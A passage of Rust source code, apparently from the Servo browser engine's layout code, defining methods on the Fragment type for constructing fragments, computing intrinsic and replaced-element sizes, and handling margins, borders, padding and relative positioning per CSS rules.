inline_context: None, pseudo: node.get_pseudo_element_type().strip(), flags: FragmentFlags::empty(), debug_id: DebugId::new(), stacking_context_id: StackingContextId::root(), } } /// Constructs a new `Fragment` instance from an opaque node. pub fn from_opaque_node_and_style(node: OpaqueNode, pseudo: PseudoElementType<()>, style: ServoArc<ComputedValues>, selected_style: ServoArc<ComputedValues>, mut restyle_damage: RestyleDamage, specific: SpecificFragmentInfo) -> Fragment { let writing_mode = style.writing_mode; restyle_damage.remove(ServoRestyleDamage::RECONSTRUCT_FLOW); Fragment { node: node, style: style, selected_style: selected_style, restyle_damage: restyle_damage, border_box: LogicalRect::zero(writing_mode), border_padding: LogicalMargin::zero(writing_mode), margin: LogicalMargin::zero(writing_mode), specific: specific, inline_context: None, pseudo: pseudo, flags: FragmentFlags::empty(), debug_id: DebugId::new(), stacking_context_id: StackingContextId::root(), } } /// Creates an anonymous fragment just like this one but with the given style and fragment /// type. 
For the new anonymous fragment, layout-related values (border box, etc.) are reset to /// initial values. pub fn create_similar_anonymous_fragment(&self, style: ServoArc<ComputedValues>, specific: SpecificFragmentInfo) -> Fragment { let writing_mode = style.writing_mode; Fragment { node: self.node, style: style, selected_style: self.selected_style.clone(), restyle_damage: self.restyle_damage, border_box: LogicalRect::zero(writing_mode), border_padding: LogicalMargin::zero(writing_mode), margin: LogicalMargin::zero(writing_mode), specific: specific, inline_context: None, pseudo: self.pseudo, flags: FragmentFlags::empty(), debug_id: DebugId::new(), stacking_context_id: StackingContextId::root(), } } /// Transforms this fragment into another fragment of the given type, with the given size, /// preserving all the other data. pub fn transform(&self, size: LogicalSize<Au>, info: SpecificFragmentInfo) -> Fragment { let new_border_box = LogicalRect::from_point_size(self.style.writing_mode, self.border_box.start, size); let mut restyle_damage = RestyleDamage::rebuild_and_reflow(); restyle_damage.remove(ServoRestyleDamage::RECONSTRUCT_FLOW); Fragment { node: self.node, style: self.style.clone(), selected_style: self.selected_style.clone(), restyle_damage: restyle_damage, border_box: new_border_box, border_padding: self.border_padding, margin: self.margin, specific: info, inline_context: self.inline_context.clone(), pseudo: self.pseudo.clone(), flags: FragmentFlags::empty(), debug_id: self.debug_id.clone(), stacking_context_id: StackingContextId::root(), } } /// Transforms this fragment using the given `SplitInfo`, preserving all the other data. pub fn transform_with_split_info(&self, split: &SplitInfo, text_run: Arc<TextRun>) -> Fragment { let size = LogicalSize::new(self.style.writing_mode, split.inline_size, self.border_box.size.block); // Preserve the insertion point if it is in this fragment's range or it is at line end. let (flags, insertion_point) = match self.specific { SpecificFragmentInfo::ScannedText(ref info) => { match info.insertion_point { Some(index) if split.range.contains(index) => (info.flags, info.insertion_point), Some(index) if index == ByteIndex(text_run.text.chars().count() as isize - 1) && index == split.range.end() => (info.flags, info.insertion_point), _ => (info.flags, None) } }, _ => (ScannedTextFlags::empty(), None) }; let info = Box::new(ScannedTextFragmentInfo::new( text_run, split.range, size, insertion_point, flags, )); self.transform(size, SpecificFragmentInfo::ScannedText(info)) } /// Transforms this fragment into an ellipsis fragment, preserving all the other data. 
pub fn transform_into_ellipsis(&self, layout_context: &LayoutContext, text_overflow_string: String) -> Fragment { let mut unscanned_ellipsis_fragments = LinkedList::new(); let mut ellipsis_fragment = self.transform( self.border_box.size, SpecificFragmentInfo::UnscannedText( Box::new(UnscannedTextFragmentInfo::new(text_overflow_string, None)) ) ); unscanned_ellipsis_fragments.push_back(ellipsis_fragment); let ellipsis_fragments = with_thread_local_font_context(layout_context, |font_context| { TextRunScanner::new().scan_for_runs(font_context, unscanned_ellipsis_fragments) }); debug_assert!(ellipsis_fragments.len() == 1); ellipsis_fragment = ellipsis_fragments.fragments.into_iter().next().unwrap(); ellipsis_fragment.flags |= FragmentFlags::IS_ELLIPSIS; ellipsis_fragment } pub fn restyle_damage(&self) -> RestyleDamage { self.restyle_damage | self.specific.restyle_damage() } pub fn contains_node(&self, node_address: OpaqueNode) -> bool { node_address == self.node || self.inline_context.as_ref().map_or(false, |ctx| { ctx.contains_node(node_address) }) } /// Adds a style to the inline context for this fragment. If the inline context doesn't exist /// yet, it will be created. pub fn add_inline_context_style(&mut self, node_info: InlineFragmentNodeInfo) { if self.inline_context.is_none() { self.inline_context = Some(InlineFragmentContext::new()); } self.inline_context.as_mut().unwrap().nodes.push(node_info); } /// Determines which quantities (border/padding/margin/specified) should be included in the /// intrinsic inline size of this fragment. fn quantities_included_in_intrinsic_inline_size(&self) -> QuantitiesIncludedInIntrinsicInlineSizes { match self.specific { SpecificFragmentInfo::Canvas(_) | SpecificFragmentInfo::Generic | SpecificFragmentInfo::GeneratedContent(_) | SpecificFragmentInfo::Iframe(_) | SpecificFragmentInfo::Image(_) | SpecificFragmentInfo::InlineAbsolute(_) | SpecificFragmentInfo::Multicol | SpecificFragmentInfo::Svg(_) => { QuantitiesIncludedInIntrinsicInlineSizes::all() } SpecificFragmentInfo::Table => { QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_SPECIFIED | QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_PADDING | QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_BORDER } SpecificFragmentInfo::TableCell => { let base_quantities = QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_PADDING | QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_SPECIFIED; if self.style.get_inheritedtable().border_collapse == border_collapse::T::separate { base_quantities | QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_BORDER } else { base_quantities } } SpecificFragmentInfo::TableWrapper => { let base_quantities = QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_MARGINS | QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_SPECIFIED; if self.style.get_inheritedtable().border_collapse == border_collapse::T::separate { base_quantities | QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_BORDER } else { base_quantities } } SpecificFragmentInfo::TableRow => { let base_quantities = QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_SPECIFIED; if self.style.get_inheritedtable().border_collapse == border_collapse::T::separate { base_quantities | QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_BORDER } else { base_quantities } } 
SpecificFragmentInfo::TruncatedFragment(_) | SpecificFragmentInfo::ScannedText(_) | SpecificFragmentInfo::TableColumn(_) | SpecificFragmentInfo::UnscannedText(_) | SpecificFragmentInfo::InlineAbsoluteHypothetical(_) | SpecificFragmentInfo::InlineBlock(_) | SpecificFragmentInfo::MulticolColumn => { QuantitiesIncludedInIntrinsicInlineSizes::empty() } } } /// Returns the portion of the intrinsic inline-size that consists of borders/padding and /// margins, respectively. /// /// FIXME(#2261, pcwalton): This won't work well for inlines: is this OK? pub fn surrounding_intrinsic_inline_size(&self) -> (Au, Au) { let flags = self.quantities_included_in_intrinsic_inline_size(); let style = self.style(); // FIXME(pcwalton): Percentages should be relative to any definite size per CSS-SIZING. // This will likely need to be done by pushing down definite sizes during selector // cascading. let margin = if flags.contains( QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_MARGINS) { let margin = style.logical_margin(); (MaybeAuto::from_style(margin.inline_start, Au(0)).specified_or_zero() + MaybeAuto::from_style(margin.inline_end, Au(0)).specified_or_zero()) } else { Au(0) }; // FIXME(pcwalton): Percentages should be relative to any definite size per CSS-SIZING. // This will likely need to be done by pushing down definite sizes during selector // cascading. let padding = if flags.contains( QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_PADDING) { let padding = style.logical_padding(); (padding.inline_start.to_used_value(Au(0)) + padding.inline_end.to_used_value(Au(0))) } else { Au(0) }; let border = if flags.contains( QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_BORDER) { self.border_width().inline_start_end() } else { Au(0) }; (border + padding, margin) } /// Uses the style only to estimate the intrinsic inline-sizes. These may be modified for text /// or replaced elements. pub fn style_specified_intrinsic_inline_size(&self) -> IntrinsicISizesContribution { let flags = self.quantities_included_in_intrinsic_inline_size(); let style = self.style(); // FIXME(#2261, pcwalton): This won't work well for inlines: is this OK? let (border_padding, margin) = self.surrounding_intrinsic_inline_size(); let mut specified = Au(0); if flags.contains(QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_SPECIFIED) { specified = MaybeAuto::from_style(style.content_inline_size(), Au(0)).specified_or_zero(); specified = max(style.min_inline_size().to_used_value(Au(0)), specified); if let Some(max) = style.max_inline_size().to_used_value(Au(0)) { specified = min(specified, max) } if self.style.get_position().box_sizing == box_sizing::T::border_box { specified = max(Au(0), specified - border_padding); } } IntrinsicISizesContribution { content_intrinsic_sizes: IntrinsicISizes { minimum_inline_size: specified, preferred_inline_size: specified, }, surrounding_size: border_padding + margin, } } /// intrinsic width of this replaced element. #[inline] pub fn intrinsic_width(&self) -> Au { match self.specific { SpecificFragmentInfo::Image(ref info) => { if let Some(ref data) = info.metadata { Au::from_px(data.width as i32) } else { Au(0) } } SpecificFragmentInfo::Canvas(ref info) => info.dom_width, SpecificFragmentInfo::Svg(ref info) => info.dom_width, // Note: Currently for replaced element with no intrinsic size, // this function simply returns the default object size. 
As long as
            // these elements do not have intrinsic aspect ratio this should be
            // sufficient, but we may need to investigate if this is enough for
            // use cases like SVG.
            SpecificFragmentInfo::Iframe(_) => Au::from_px(DEFAULT_REPLACED_WIDTH),
            _ => panic!("Trying to get intrinsic width on non-replaced element!")
        }
    }

    /// intrinsic height of this replaced element.
    #[inline]
    pub fn intrinsic_height(&self) -> Au {
        match self.specific {
            SpecificFragmentInfo::Image(ref info) => {
                if let Some(ref data) = info.metadata {
                    Au::from_px(data.height as i32)
                } else {
                    Au(0)
                }
            }
            SpecificFragmentInfo::Canvas(ref info) => info.dom_height,
            SpecificFragmentInfo::Svg(ref info) => info.dom_height,
            SpecificFragmentInfo::Iframe(_) => Au::from_px(DEFAULT_REPLACED_HEIGHT),
            _ => panic!("Trying to get intrinsic height on non-replaced element!")
        }
    }

    /// Whether this replaced element has an intrinsic aspect ratio.
    pub fn has_intrinsic_ratio(&self) -> bool {
        match self.specific {
            SpecificFragmentInfo::Image(_)  |
            SpecificFragmentInfo::Canvas(_) |
            // TODO(stshine): According to the SVG spec, whether a SVG element has intrinsic
            // aspect ratio is determined by the `preserveAspectRatio` attribute. Since for
            // now SVG is far from implemented, we simply choose the default behavior that
            // the intrinsic aspect ratio is preserved.
            // https://svgwg.org/svg2-draft/coords.html#PreserveAspectRatioAttribute
            SpecificFragmentInfo::Svg(_) =>
                self.intrinsic_width() != Au(0) && self.intrinsic_height() != Au(0),
            _ => false
        }
    }

    /// CSS 2.1 § 10.3.2 & 10.6.2 Calculate the used width and height of a replaced element.
    /// When a parameter is `None` it means the specified size in a certain direction
    /// is unconstrained. The inline containing size can also be `None` since this
    /// method is also used for calculating intrinsic inline size contribution.
    pub fn calculate_replaced_sizes(&self,
                                    containing_inline_size: Option<Au>,
                                    containing_block_size: Option<Au>)
                                    -> (Au, Au) {
        let (intrinsic_inline_size, intrinsic_block_size) = if self.style.writing_mode.is_vertical() {
            (self.intrinsic_height(), self.intrinsic_width())
        } else {
            (self.intrinsic_width(), self.intrinsic_height())
        };

        // Make sure the size we used here is for content box since they may be
        // transferred by the intrinsic aspect ratio.
        let inline_size = style_length(self.style.content_inline_size(), containing_inline_size)
            .map(|x| x - self.box_sizing_boundary(Direction::Inline));
        let block_size = style_length(self.style.content_block_size(), containing_block_size)
            .map(|x| x - self.box_sizing_boundary(Direction::Block));
        let inline_constraint = self.size_constraint(containing_inline_size, Direction::Inline);
        let block_constraint = self.size_constraint(containing_block_size, Direction::Block);

        // https://drafts.csswg.org/css-images-3/#default-sizing
        match (inline_size, block_size) {
            // If the specified size is a definite width and height, the concrete
            // object size is given that width and height.
            (MaybeAuto::Specified(inline_size), MaybeAuto::Specified(block_size)) =>
                (inline_constraint.clamp(inline_size), block_constraint.clamp(block_size)),
            // If the specified size is only a width or height (but not both)
            // then the concrete object size is given that specified width or
            // height. The other dimension is calculated as follows:
            //
            // If the object has an intrinsic aspect ratio, the missing dimension
            // of the concrete object size is calculated using the intrinsic
            // aspect ratio and the present dimension.
            //
            // Otherwise, if the missing dimension is present in the object’s intrinsic
            // dimensions, the missing dimension is taken from the object’s intrinsic
            // dimensions. Otherwise it is taken from the default object size.
            (MaybeAuto::Specified(inline_size), MaybeAuto::Auto) => {
                let inline_size = inline_constraint.clamp(inline_size);
                let block_size = if self.has_intrinsic_ratio() {
                    // Note: We cannot precompute the ratio and store it as a float, because
                    // doing so may result in a one-pixel difference in calculation for
                    // certain images, making some tests fail.
                    Au::new((inline_size.0 as i64 * intrinsic_block_size.0 as i64 /
                             intrinsic_inline_size.0 as i64) as i32)
                } else {
                    intrinsic_block_size
                };
                (inline_size, block_constraint.clamp(block_size))
            }
            (MaybeAuto::Auto, MaybeAuto::Specified(block_size)) => {
                let block_size = block_constraint.clamp(block_size);
                let inline_size = if self.has_intrinsic_ratio() {
                    Au::new((block_size.0 as i64 * intrinsic_inline_size.0 as i64 /
                             intrinsic_block_size.0 as i64) as i32)
                } else {
                    intrinsic_inline_size
                };
                (inline_constraint.clamp(inline_size), block_size)
            }
            // https://drafts.csswg.org/css2/visudet.html#min-max-widths
            (MaybeAuto::Auto, MaybeAuto::Auto) => {
                if self.has_intrinsic_ratio() {
                    // This approach follows the spirit of the cover and contain constraints.
                    // https://drafts.csswg.org/css-images-3/#cover-contain
                    // First, create two rectangles that keep the aspect ratio but may be
                    // clamped by the constraints.
                    let first_isize = inline_constraint.clamp(intrinsic_inline_size);
                    let first_bsize = Au::new((first_isize.0 as i64 *
                                               intrinsic_block_size.0 as i64 /
                                               intrinsic_inline_size.0 as i64) as i32);
                    let second_bsize = block_constraint.clamp(intrinsic_block_size);
                    let second_isize = Au::new((second_bsize.0 as i64 *
                                                intrinsic_inline_size.0 as i64 /
                                                intrinsic_block_size.0 as i64) as i32);
                    let (inline_size, block_size) =
                        match (first_isize.cmp(&intrinsic_inline_size),
                               second_isize.cmp(&intrinsic_inline_size)) {
                            (Ordering::Equal, Ordering::Equal) =>
                                (first_isize, first_bsize),
                            // When only one rectangle is clamped, use it.
                            (Ordering::Equal, _) =>
                                (second_isize, second_bsize),
                            (_, Ordering::Equal) =>
                                (first_isize, first_bsize),
                            // When both rectangles grow (they were smaller than the min
                            // sizes), choose the larger one.
                            (Ordering::Greater, Ordering::Greater) =>
                                if first_isize > second_isize {
                                    (first_isize, first_bsize)
                                } else {
                                    (second_isize, second_bsize)
                                },
                            // When both rectangles shrink (they were larger than the max
                            // sizes), choose the smaller one.
                            (Ordering::Less, Ordering::Less) =>
                                if first_isize > second_isize {
                                    (second_isize, second_bsize)
                                } else {
                                    (first_isize, first_bsize)
                                },
                            // It does not matter which we choose here, because both sizes
                            // will be clamped by the constraints.
                            (Ordering::Less, Ordering::Greater) |
                            (Ordering::Greater, Ordering::Less) =>
                                (first_isize, first_bsize)
                        };
                    // Clamp the result and we are done :-)
                    (inline_constraint.clamp(inline_size), block_constraint.clamp(block_size))
                } else {
                    (inline_constraint.clamp(intrinsic_inline_size),
                     block_constraint.clamp(intrinsic_block_size))
                }
            }
        }
    }

    /// Returns a size constraint that can be used to clamp a size in the given direction.
    /// To take `box-sizing: border-box` into account, the `border_padding` field
    /// must be initialized first.
    ///
    /// TODO(stshine): Maybe there is a more convenient way.
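    /// A hedged usage sketch matching the call sites in this file (not a doc test;
    /// `containing_size` and `tentative_size` are illustrative names):
    /// ```ignore
    /// // Clamp a tentative content size against min/max in one direction. With
    /// // `box-sizing: border-box`, the border/padding extent is accounted for
    /// // before clamping.
    /// let constraint = fragment.size_constraint(Some(containing_size), Direction::Inline);
    /// let used_size = constraint.clamp(tentative_size);
    /// ```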
pub fn size_constraint(&self, containing_size: Option<Au>, direction: Direction) -> SizeConstraint { let (style_min_size, style_max_size) = match direction { Direction::Inline => (self.style.min_inline_size(), self.style.max_inline_size()), Direction::Block => (self.style.min_block_size(), self.style.max_block_size()) }; let border = if self.style().get_position().box_sizing == box_sizing::T::border_box { Some(self.border_padding.start_end(direction)) } else { None }; SizeConstraint::new(containing_size, style_min_size, style_max_size, border) } /// Returns a guess as to the distances from the margin edge of this fragment to its content /// in the inline direction. This will generally be correct unless percentages are involved. /// /// This is used for the float placement speculation logic. pub fn guess_inline_content_edge_offsets(&self) -> SpeculatedInlineContentEdgeOffsets { let logical_margin = self.style.logical_margin(); let logical_padding = self.style.logical_padding(); let border_width = self.border_width(); SpeculatedInlineContentEdgeOffsets { start: MaybeAuto::from_style(logical_margin.inline_start, Au(0)).specified_or_zero() + logical_padding.inline_start.to_used_value(Au(0)) + border_width.inline_start, end: MaybeAuto::from_style(logical_margin.inline_end, Au(0)).specified_or_zero() + logical_padding.inline_end.to_used_value(Au(0)) + border_width.inline_end, } } /// Returns the sum of the inline-sizes of all the borders of this fragment. Note that this /// can be expensive to compute, so if possible use the `border_padding` field instead. #[inline] pub fn border_width(&self) -> LogicalMargin<Au> { let style_border_width = self.style().logical_border_width(); // NOTE: We can have nodes with different writing mode inside // the inline fragment context, so we need to overwrite the // writing mode to compute the child logical sizes. let writing_mode = self.style.writing_mode; let context_border = match self.inline_context { None => LogicalMargin::zero(writing_mode), Some(ref inline_fragment_context) => { inline_fragment_context.nodes.iter().fold(style_border_width, |accumulator, node| { let mut this_border_width = node.style.border_width_for_writing_mode(writing_mode); if !node.flags.contains(InlineFragmentNodeFlags::FIRST_FRAGMENT_OF_ELEMENT) { this_border_width.inline_start = Au(0) } if !node.flags.contains(InlineFragmentNodeFlags::LAST_FRAGMENT_OF_ELEMENT) { this_border_width.inline_end = Au(0) } accumulator + this_border_width }) } }; style_border_width + context_border } /// Returns the border width in given direction if this fragment has property /// 'box-sizing: border-box'. The `border_padding` field must have been initialized. pub fn box_sizing_boundary(&self, direction: Direction) -> Au { match (self.style().get_position().box_sizing, direction) { (box_sizing::T::border_box, Direction::Inline) => { self.border_padding.inline_start_end() } (box_sizing::T::border_box, Direction::Block) => { self.border_padding.block_start_end() } _ => Au(0) } } /// Computes the margins in the inline direction from the containing block inline-size and the /// style. After this call, the inline direction of the `margin` field will be correct. /// /// Do not use this method if the inline direction margins are to be computed some other way /// (for example, via constraint solving for blocks). 
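    /// A hedged sketch of the percentage resolution performed below (per CSS 2.1,
    /// inline-direction margin percentages resolve against the containing block's
    /// inline-size, and `auto` resolves to zero here):
    /// ```ignore
    /// // style: margin-inline-start: 10%; margin-inline-end: auto
    /// fragment.compute_inline_direction_margins(Au::from_px(200));
    /// assert_eq!(fragment.margin.inline_start, Au::from_px(20)); // 10% of 200px
    /// assert_eq!(fragment.margin.inline_end, Au(0));             // auto -> zero
    /// ```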
    pub fn compute_inline_direction_margins(&mut self, containing_block_inline_size: Au) {
        match self.specific {
            SpecificFragmentInfo::Table |
            SpecificFragmentInfo::TableCell |
            SpecificFragmentInfo::TableRow |
            SpecificFragmentInfo::TableColumn(_) |
            SpecificFragmentInfo::InlineAbsoluteHypothetical(_) => {
                self.margin.inline_start = Au(0);
                self.margin.inline_end = Au(0);
                return
            }
            _ => {
                let margin = self.style().logical_margin();
                self.margin.inline_start =
                    MaybeAuto::from_style(margin.inline_start,
                                          containing_block_inline_size).specified_or_zero();
                self.margin.inline_end =
                    MaybeAuto::from_style(margin.inline_end,
                                          containing_block_inline_size).specified_or_zero();
            }
        }

        if let Some(ref inline_context) = self.inline_context {
            for node in &inline_context.nodes {
                let margin = node.style.logical_margin();
                let this_inline_start_margin = if !node.flags.contains(
                        InlineFragmentNodeFlags::FIRST_FRAGMENT_OF_ELEMENT) {
                    Au(0)
                } else {
                    MaybeAuto::from_style(margin.inline_start,
                                          containing_block_inline_size).specified_or_zero()
                };
                let this_inline_end_margin = if !node.flags.contains(
                        InlineFragmentNodeFlags::LAST_FRAGMENT_OF_ELEMENT) {
                    Au(0)
                } else {
                    MaybeAuto::from_style(margin.inline_end,
                                          containing_block_inline_size).specified_or_zero()
                };

                self.margin.inline_start += this_inline_start_margin;
                self.margin.inline_end += this_inline_end_margin;
            }
        }
    }

    /// Computes the margins in the block direction from the containing block inline-size and the
    /// style. After this call, the block direction of the `margin` field will be correct.
    ///
    /// Do not use this method if the block direction margins are to be computed some other way
    /// (for example, via constraint solving for absolutely-positioned flows).
    pub fn compute_block_direction_margins(&mut self, containing_block_inline_size: Au) {
        match self.specific {
            SpecificFragmentInfo::Table |
            SpecificFragmentInfo::TableCell |
            SpecificFragmentInfo::TableRow |
            SpecificFragmentInfo::TableColumn(_) => {
                self.margin.block_start = Au(0);
                self.margin.block_end = Au(0)
            }
            _ => {
                // NB: Percentages are relative to containing block inline-size (not block-size)
                // per CSS 2.1.
                let margin = self.style().logical_margin();
                self.margin.block_start =
                    MaybeAuto::from_style(margin.block_start, containing_block_inline_size)
                    .specified_or_zero();
                self.margin.block_end =
                    MaybeAuto::from_style(margin.block_end, containing_block_inline_size)
                    .specified_or_zero();
            }
        }
    }

    /// Computes the border and padding in both inline and block directions from the containing
    /// block inline-size and the style. After this call, the `border_padding` field will be
    /// correct.
    pub fn compute_border_and_padding(&mut self, containing_block_inline_size: Au) {
        // Compute border.
        let border = match self.style.get_inheritedtable().border_collapse {
            border_collapse::T::separate => self.border_width(),
            border_collapse::T::collapse => LogicalMargin::zero(self.style.writing_mode),
        };

        // Compute padding from the fragment's style.
        let padding_from_style = match self.specific {
            SpecificFragmentInfo::TableColumn(_) |
            SpecificFragmentInfo::TableRow |
            SpecificFragmentInfo::TableWrapper => LogicalMargin::zero(self.style.writing_mode),
            _ => model::padding_from_style(self.style(),
                                           containing_block_inline_size,
                                           self.style().writing_mode),
        };

        // Compute padding from the inline fragment context.
let padding_from_inline_fragment_context = match (&self.specific, &self.inline_context) { (_, &None) | (&SpecificFragmentInfo::TableColumn(_), _) | (&SpecificFragmentInfo::TableRow, _) | (&SpecificFragmentInfo::TableWrapper, _) => { LogicalMargin::zero(self.style.writing_mode) } (_, &Some(ref inline_fragment_context)) => { let writing_mode = self.style.writing_mode; let zero_padding = LogicalMargin::zero(writing_mode); inline_fragment_context.nodes.iter().fold(zero_padding, |accumulator, node| { let mut padding = model::padding_from_style(&*node.style, Au(0), writing_mode); if !node.flags.contains(InlineFragmentNodeFlags::FIRST_FRAGMENT_OF_ELEMENT) { padding.inline_start = Au(0) } if !node.flags.contains(InlineFragmentNodeFlags::LAST_FRAGMENT_OF_ELEMENT) { padding.inline_end = Au(0) } accumulator + padding }) } }; self.border_padding = border + padding_from_style + padding_from_inline_fragment_context } // Return offset from original position because of `position: relative`. pub fn relative_position(&self, containing_block_size: &LogicalSize<Au>) -> LogicalSize<Au> { fn from_style(style: &ComputedValues, container_size: &LogicalSize<Au>) -> LogicalSize<Au> { let offsets = style.logical_position(); let offset_i = if offsets.inline_start != LengthOrPercentageOrAuto::Auto { MaybeAuto::from_style(offsets.inline_start, container_size.inline).specified_or_zero() } else { -MaybeAuto::from_style(offsets.inline_end, container_size.inline).specified_or_zero() }; let offset_b = if offsets.block_start != LengthOrPercentageOrAuto::Auto { MaybeAuto::from_style(offsets.block_start, container_size.block).specified_or_zero() } else { -MaybeAuto::from_style(offsets.block_end, container_size.block).specified_or_zero() }; LogicalSize::new(style.writing_mode, offset_i, offset_b) } // Go over the ancestor fragments and add all relative offsets (if any). let mut rel_pos = if self.style().get_box().position == position::T::relative { from_style(self.style(), containing_block_size) } else { LogicalSize::zero(self.style.writing_mode) }; if let Some(ref inline_fragment_context) = self.inline_context { for node in &inline_fragment_context.nodes { if node.style.get_box().position == position::T::relative { rel_pos = rel_pos + from_style(&*node.style, containing_block_size); } } } rel_pos } /// Always inline for SCCP. /// /// FIXME(pcwalton): Just replace with the clear type from the style module for speed? #[inline(always)] pub fn clear(&self) -> Option<ClearType> { let style = self.style(); match style.get_box().clear { clear::T::none => None, clear::T::left => Some(ClearType::Left), clear::T::right => Some(ClearType::Right), clear::T::both => Some(ClearType::Both), } } #[inline(always)] pub fn style(&self) -> &ComputedValues { &*self.style } #[inline(always)] pub fn selected_style(&self) -> &ComputedValues { &*self.selected_style } pub fn white_space(&self) -> white_space::T { self.style().get_inheritedtext().white_space } pub fn color(&self) -> color::T { self.style().get_color().color } /// Returns the text decoration line of this fragment, according to the style of the nearest ancestor /// element. /// /// NB: This may not be the actual text decoration line, because of the override rules specified in /// CSS 2.1 § 16.3.1. Unfortunately, computing this properly doesn't really fit into Servo's /// model. Therefore, this is a best lower bound approximation, but the end result may actually /// have the various decoration flags turned on afterward. 
pub fn text_decoration_line(&self) -> text_decoration_line::T { self.style().get_text().text_decoration_line } /// Returns the inline-start offset from margin edge to content edge. /// /// FIXME(#2262, pcwalton): I think this method is pretty bogus, because it won't work for /// inlines. pub fn inline_start_offset(&self) -> Au { match self.specific { SpecificFragmentInfo::TableWrapper => self.margin.inline_start, SpecificFragmentInfo::Table | SpecificFragmentInfo::TableCell | SpecificFragmentInfo::TableRow => self.border_padding.inline_start, SpecificFragmentInfo::TableColumn(_) => Au(0), _ => self.margin.inline_start + self.border_padding.inline_start, } } /// Returns true if this element can be split. This is true for text fragments, unless /// `white-space: pre` or `white-space: nowrap` is set. pub fn can_split(&self) -> bool { self.is_scanned_text_fragment() && self.white_space().allow_wrap() } /// Returns true if and only if this fragment is a generated content fragment. pub fn is_unscanned_generated_content(&self) -> bool { match self.specific { SpecificFragmentInfo::GeneratedContent(ref content) => match **content { GeneratedContentInfo::Empty => false, _ => true, }, _ => false, } } /// Returns true if and only if this is a scanned text fragment. pub fn is_scanned_text_fragment(&self) -> bool { match self.specific { SpecificFragmentInfo::ScannedText(..) => true, _ => false, } } /// Computes the intrinsic inline-sizes of this fragment. pub fn compute_intrinsic_inline_sizes(&mut self) -> IntrinsicISizesContribution { let mut result = self.style_specified_intrinsic_inline_size(); match self.specific { SpecificFragmentInfo::Generic | SpecificFragmentInfo::GeneratedContent(_) | SpecificFragmentInfo::Table | SpecificFragmentInfo::TableCell | SpecificFragmentInfo::TableColumn(_) | SpecificFragmentInfo::TableRow | SpecificFragmentInfo::TableWrapper | SpecificFragmentInfo::Multicol | SpecificFragmentInfo::MulticolColumn | SpecificFragmentInfo::InlineAbsoluteHypothetical(_) => {} SpecificFragmentInfo::InlineBlock(ref info) => { let block_flow = info.flow_ref.as_block(); result.union_block(&block_flow.base.intrinsic_inline_sizes) } SpecificFragmentInfo::InlineAbsolute(ref info) => { let block_flow = info.flow_ref.as_block(); result.union_block(&block_flow.base.intrinsic_inline_sizes) } SpecificFragmentInfo::Image(_) | SpecificFragmentInfo::Canvas(_) | SpecificFragmentInfo::Iframe(_) | SpecificFragmentInfo::Svg(_) => { let mut inline_size = match self.style.content_inline_size() { LengthOrPercentageOrAuto::Auto | LengthOrPercentageOrAuto::Percentage(_) => { // We have to initialize the `border_padding` field first to make // the size constraints work properly. // TODO(stshine): Find a cleaner way to do this. 
let padding = self.style.logical_padding(); self.border_padding.inline_start = padding.inline_start.to_used_value(Au(0)); self.border_padding.inline_end = padding.inline_end.to_used_value(Au(0)); self.border_padding.block_start = padding.block_start.to_used_value(Au(0)); self.border_padding.block_end = padding.block_end.to_used_value(Au(0)); let border = self.border_width(); self.border_padding.inline_start += border.inline_start; self.border_padding.inline_end += border.inline_end; self.border_padding.block_start += border.block_start; self.border_padding.block_end += border.block_end; let (result_inline, _) = self.calculate_replaced_sizes(None, None); result_inline } LengthOrPercentageOrAuto::Length(length) => Au::from(length), LengthOrPercentageOrAuto::Calc(calc) => { // TODO(nox): This is probably wrong, because it accounts neither for // clamping (not sure if necessary here) nor percentage. Au::from(calc.unclamped_length()) }, }; let size_constraint = self.size_constraint(None, Direction::Inline); inline_size = size_constraint.clamp(inline_size); result.union_block(&IntrinsicISizes { minimum_inline_size: inline_size, preferred_inline_size: inline_size, }); } SpecificFragmentInfo::TruncatedFragment(ref t) if t.text_info.is_some() => { let text_fragment_info = t.text_info.as_ref().unwrap(); handle_text(text_fragment_info, self, &mut result) } SpecificFragmentInfo::ScannedText(ref text_fragment_info) => { handle_text(text_fragment_info, self, &mut result) } SpecificFragmentInfo::TruncatedFragment(_) => { return IntrinsicISizesContribution::new() } SpecificFragmentInfo::UnscannedText(..) => { panic!("Unscanned text fragments should have been scanned by now!") } }; fn handle_text(text_fragment_info: &ScannedTextFragmentInfo, self_: &Fragment, result: &mut IntrinsicISizesContribution) { let range = &text_fragment_info.range; // See http://dev.w3.org/csswg/css-sizing/#max-content-inline-size. // TODO: Account for soft wrap opportunities. let max_line_inline_size = text_fragment_info.run .metrics_for_range(range) .advance_width; let min_line_inline_size = if self_.white_space().allow_wrap() { text_fragment_info.run.min_width_for_range(range) } else { max_line_inline_size }; result.union_block(&IntrinsicISizes { minimum_inline_size: min_line_inline_size, preferred_inline_size: max_line_inline_size, }) } // Take borders and padding for parent inline fragments into account. let writing_mode = self.style.writing_mode; if let Some(ref context) = self.inline_context { for node in &context.nodes { let mut border_width = node.style.logical_border_width(); let mut padding = model::padding_from_style(&*node.style, Au(0), writing_mode); let mut margin = model::specified_margin_from_style(&*node.style, writing_mode); if !node.flags.contains(InlineFragmentNodeFlags::FIRST_FRAGMENT_OF_ELEMENT) { border_width.inline_start = Au(0); padding.inline_start = Au(0); margin.inline_start = Au(0); } if 